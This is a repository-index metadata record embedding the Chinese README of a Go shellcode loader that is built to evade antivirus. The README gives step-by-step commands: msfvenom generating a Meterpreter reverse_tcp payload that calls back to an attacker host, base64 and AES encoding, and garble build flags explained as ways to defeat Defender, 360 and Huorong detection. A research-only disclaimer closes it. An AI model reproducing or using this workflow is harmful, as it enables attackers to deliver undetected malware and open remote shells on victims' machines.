{"id":13841795,"url":"https://github.com/HZzz2/go-shellcode-loader","last_synced_at":"2025-07-11T13:32:32.938Z","repository":{"id":37352451,"uuid":"500704651","full_name":"HZzz2/go-shellcode-loader","owner":"HZzz2","description":"GO免杀shellcode加载器混淆AES加密","archived":false,"fork":false,"pushed_at":"2022-07-28T11:56:25.000Z","size":36,"stargazers_count":240,"open_issues_count":6,"forks_count":50,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-08-05T17:29:05.971Z","etag":null,"topics":["av","go-shellcode","shellcode-encode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HZzz2.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-07T05:41:42.000Z","updated_at":"2024-07-22T05:44:59.000Z","dependencies_parsed_at":"2022-07-20T12:02:25.721Z","dependency_job_id":null,"html_url":"https://github.com/HZzz2/go-shellcode-loader","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HZzz2","download_url":"https://codeload.github.com/HZzz2/go-shellcode-loader/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729674,"owners_count":17515153,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["av","go-shellcode","shellcode-encode","shellcode-loader"],"created_at":"2024-08-04T17:01:21.320Z","updated_at":"2024-11-21T12:30:25.028Z","avatar_url":"https://github.com/HZzz2.png","language":"Go","readme":"# go-shellcode-loader\n\nGO混淆免杀shellcode加载器AES加密\n\n混淆反检测 过DF、360和火绒\n\n\n#### 获取项目\n\n```Bash\ngit clone https://github.com/HZzz2/go-shellcode-loader.git\ncd go-shellcode-loader\n//下条命令安装第三方混淆库  GitHub地址：https://github.com/burrowers/garble\ngo install mvdan.cc/garble@latest    \n\n```\n\n#### 生成shellcode并base64\n\n`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw \u003e rev.raw`\n\n`base64 -w 0 -i rev.raw \u003e rev.bs64`\n\n`cat rev.bs64`\n\n**复制到aes-sc.go中的51行替换payload**\n\n运行aes-sc.go生成AES加密后的值\n\n`go run aes_sc.go`\n\n复制输出的值到go-sc.go中的73行替换payload\n\n#### **编译成exe可执行程序**\n\n`garble -tiny -literals -seed=random build -ldflags=\"-w -s -H windowsgui\" -race go-sc.go`\n\n参数解释：\n\n  garble(混淆库)：\n                          \n                          -tiny                    删除额外信息\n                          \n                          -literals               混淆文字\n\n                          -seed=random   base64编码的随机种子 \n\n  go：\n        \n        -w                        去掉调试信息，不能gdb调试了\n\n        -s                         去掉符号表\n\n        -H windowsgui    隐藏执行窗口，不占用 cmd 终端。 （被查杀率高）\n\n        -race                    使数据允许竞争检测，编译时改变了生成后的文件特征， 使得杀软无法检测，当然有一天也会失效的。\n\n编译后得到go-sc.exe\n\n#### 检测图\n\n**火绒**\n\n![image](https://user-images.githubusercontent.com/22775890/172315590-c32aa9ad-0b2b-43cd-a96c-45d971a83ef5.png)\n\n\n**360杀毒**\n\n![image](https://user-images.githubusercontent.com/22775890/172315610-9bfa9d41-31a1-42d5-bd54-b0ce3e73318d.png)\n\n\n**360卫士**\n\n![image](https://user-images.githubusercontent.com/22775890/172315642-73266f42-6019-42b7-bb02-5dd59b0925b7.png)\n\n\n\n**DF**\n\n![image](https://user-images.githubusercontent.com/22775890/172315670-89a23a36-5e1f-40e8-b311-a4a22490d1ca.png)\n\n\n\n**virustotal**\n\n![image](https://user-images.githubusercontent.com/22775890/172315706-4fbd57a6-0e14-497a-af91-ea6c7cdf0704.png)\n\n\n\n**微步云杀箱**\n\n![image](https://user-images.githubusercontent.com/22775890/172315732-84eb7a75-481c-4904-a341-bd96a336ad87.png)\n\n\n\n\n**运行效果**\n\n\n\n\nhttps://user-images.githubusercontent.com/22775890/172315782-707cfbbb-90ed-4156-97d8-dcaf0da8a554.mp4\n\n\n## 免责声明\n仅供安全研究与教学之用，如果使用者将其做其他用途，由使用者承担全部法律及连带责任，本人不承担任何法律及连带责任。\n","funding_links":[],"categories":["web shell、shellcode","Go"],"sub_categories":["网络服务_其他"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHZzz2%2Fgo-shellcode-loader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHZzz2%2Fgo-shellcode-loader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHZzz2%2Fgo-shellcode-loader/lists"}